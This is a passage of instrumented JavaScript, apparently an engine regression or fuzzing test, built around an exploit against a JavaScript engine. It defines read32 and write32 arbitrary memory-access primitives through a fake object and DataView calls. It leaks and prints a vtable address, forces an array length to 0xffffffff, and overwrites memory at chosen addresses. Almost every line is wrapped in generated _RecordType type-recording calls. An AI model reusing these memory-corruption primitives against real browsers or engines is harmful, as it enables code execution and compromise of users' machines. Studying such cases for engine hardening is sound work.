    arr[15] = toInt(high32(addr));
try { if (Inst159 <= 1000 && typeof (arr[15]) != "undefined") {_RecordType("<2323,2330,94>",(arr[15])); Inst159++; } } catch(e) {}try { if (Inst160 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2323,2326,94>",(arr)); Inst160++; } } catch(e) {}
try { if (Inst164 <= 1000 && typeof (DataView.prototype.getUint32.call) != "undefined") {_RecordType("<2365,2398,95>",(DataView.prototype.getUint32.call)); Inst164++; } } catch(e) {}try { if (Inst165 <= 1000 && typeof (DataView.prototype.getUint32) != "undefined") {_RecordType("<2365,2393,95>",(DataView.prototype.getUint32)); Inst165++; } } catch(e) {}try { if (Inst166 <= 1000 && typeof (DataView.prototype) != "undefined") {_RecordType("<2365,2383,95>",(DataView.prototype)); Inst166++; } } catch(e) {}try { if (Inst167 <= 1000 && typeof (DataView) != "undefined") {_RecordType("<2365,2373,95>",(DataView)); Inst167++; } } catch(e) {}try { if (Inst168 <= 1000 && typeof (fakeobj) != "undefined") {_RecordType("<2399,2406,95>",(fakeobj)); Inst168++; } } catch(e) {}
    return DataView.prototype.getUint32.call(fakeobj, 0, true);
  };
try { if (Inst152 <= 1000 && typeof (read32) != "undefined") {_RecordType("<2258,2264,92>",(read32)); Inst152++; } } catch(e) {}

  var write32 = function (addr, v) {
try { if (Inst170 <= 1000 && typeof (addr) != "undefined") {_RecordType("<2450,2454,98>",(addr)); Inst170++; } } catch(e) {}try { if (Inst171 <= 1000 && typeof (v) != "undefined") {_RecordType("<2456,2457,98>",(v)); Inst171++; } } catch(e) {}
try { if (Inst174 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<2475,2480,99>",(toInt)); Inst174++; } } catch(e) {}try { if (Inst175 <= 1000 && typeof (low32) != "undefined") {_RecordType("<2481,2486,99>",(low32)); Inst175++; } } catch(e) {}try { if (Inst176 <= 1000 && typeof (addr) != "undefined") {_RecordType("<2487,2491,99>",(addr)); Inst176++; } } catch(e) {}
    arr[14] = toInt(low32(addr));
try { if (Inst172 <= 1000 && typeof (arr[14]) != "undefined") {_RecordType("<2465,2472,99>",(arr[14])); Inst172++; } } catch(e) {}try { if (Inst173 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2465,2468,99>",(arr)); Inst173++; } } catch(e) {}
try { if (Inst179 <= 1000 && typeof (toInt) != "undefined") {_RecordType("<2509,2514,100>",(toInt)); Inst179++; } } catch(e) {}try { if (Inst180 <= 1000 && typeof (high32) != "undefined") {_RecordType("<2515,2521,100>",(high32)); Inst180++; } } catch(e) {}try { if (Inst181 <= 1000 && typeof (addr) != "undefined") {_RecordType("<2522,2526,100>",(addr)); Inst181++; } } catch(e) {}
    arr[15] = toInt(high32(addr));
try { if (Inst177 <= 1000 && typeof (arr[15]) != "undefined") {_RecordType("<2499,2506,100>",(arr[15])); Inst177++; } } catch(e) {}try { if (Inst178 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2499,2502,100>",(arr)); Inst178++; } } catch(e) {}
try { if (Inst182 <= 1000 && typeof (DataView.prototype.setUint32.call) != "undefined") {_RecordType("<2534,2567,101>",(DataView.prototype.setUint32.call)); Inst182++; } } catch(e) {}try { if (Inst183 <= 1000 && typeof (DataView.prototype.setUint32) != "undefined") {_RecordType("<2534,2562,101>",(DataView.prototype.setUint32)); Inst183++; } } catch(e) {}try { if (Inst184 <= 1000 && typeof (DataView.prototype) != "undefined") {_RecordType("<2534,2552,101>",(DataView.prototype)); Inst184++; } } catch(e) {}try { if (Inst185 <= 1000 && typeof (DataView) != "undefined") {_RecordType("<2534,2542,101>",(DataView)); Inst185++; } } catch(e) {}try { if (Inst186 <= 1000 && typeof (fakeobj) != "undefined") {_RecordType("<2568,2575,101>",(fakeobj)); Inst186++; } } catch(e) {}try { if (Inst187 <= 1000 && typeof (v) != "undefined") {_RecordType("<2580,2581,101>",(v)); Inst187++; } } catch(e) {}
    DataView.prototype.setUint32.call(fakeobj, 0, v, true);
  };
try { if (Inst169 <= 1000 && typeof (write32) != "undefined") {_RecordType("<2430,2437,98>",(write32)); Inst169++; } } catch(e) {}

try { if (Inst188 <= 1000 && typeof (WScript.Echo) != "undefined") {_RecordType("<2598,2610,104>",(WScript.Echo)); Inst188++; } } catch(e) {}try { if (Inst189 <= 1000 && typeof (WScript) != "undefined") {_RecordType("<2598,2605,104>",(WScript)); Inst189++; } } catch(e) {}try { if (Inst190 <= 1000 && typeof (read32(leakaddr + 4).toString) != "undefined") {_RecordType("<2623,2652,104>",(read32(leakaddr + 4).toString)); Inst190++; } } catch(e) {}try { if (Inst191 <= 1000 && typeof (read32) != "undefined") {_RecordType("<2623,2629,104>",(read32)); Inst191++; } } catch(e) {}try { if (Inst192 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<2630,2638,104>",(leakaddr)); Inst192++; } } catch(e) {}try { if (Inst193 <= 1000 && typeof (read32(leakaddr).toString) != "undefined") {_RecordType("<2659,2684,104>",(read32(leakaddr).toString)); Inst193++; } } catch(e) {}try { if (Inst194 <= 1000 && typeof (read32) != "undefined") {_RecordType("<2659,2665,104>",(read32)); Inst194++; } } catch(e) {}try { if (Inst195 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<2666,2674,104>",(leakaddr)); Inst195++; } } catch(e) {}
  WScript.Echo("vtable:" + read32(leakaddr + 4).toString(16) + read32(leakaddr).toString(16));
  arr.length = 0xffffffff;
try { if (Inst196 <= 1000 && typeof (arr.length) != "undefined") {_RecordType("<2693,2703,105>",(arr.length)); Inst196++; } } catch(e) {}try { if (Inst197 <= 1000 && typeof (arr) != "undefined") {_RecordType("<2693,2696,105>",(arr)); Inst197++; } } catch(e) {}
try { if (Inst198 <= 1000 && typeof (write32) != "undefined") {_RecordType("<2720,2727,106>",(write32)); Inst198++; } } catch(e) {}try { if (Inst199 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<2728,2736,106>",(leakaddr)); Inst199++; } } catch(e) {}
  write32(leakaddr + 0x44, 0xffffffff);
try { if (Inst200 <= 1000 && typeof (write32) != "undefined") {_RecordType("<2760,2767,107>",(write32)); Inst200++; } } catch(e) {}try { if (Inst201 <= 1000 && typeof (leakaddr) != "undefined") {_RecordType("<2768,2776,107>",(leakaddr)); Inst201++; } } catch(e) {}
  write32(leakaddr + 0x48, 0xffffffff);
try { if (Inst202 <= 1000 && typeof (write32) != "undefined") {_RecordType("<2800,2807,108>",(write32)); Inst202++; } } catch(e) {}
  write32(0xaaaabbbbbbbb, 0);
}

try { if (Inst204 <= 1000 && typeof (e) != "undefined") {_RecordType("<2854,2855,113>",(e)); Inst204++; } } catch(e) {}
try {
try { if (Inst203 <= 1000 && typeof (go) != "undefined") {_RecordType("<2839,2841,112>",(go)); Inst203++; } } catch(e) {}
  go();
} catch (e) {
  ;
}

try { if (Inst205 <= 1000 && typeof (console.log) != "undefined") {_RecordType("<2866,2877,117>",(console.log)); Inst205++; } } catch(e) {}try { if (Inst206 <= 1000 && typeof (console) != "undefined") {_RecordType("<2866,2873,117>",(console)); Inst206++; } } catch(e) {}
console.log('pass');

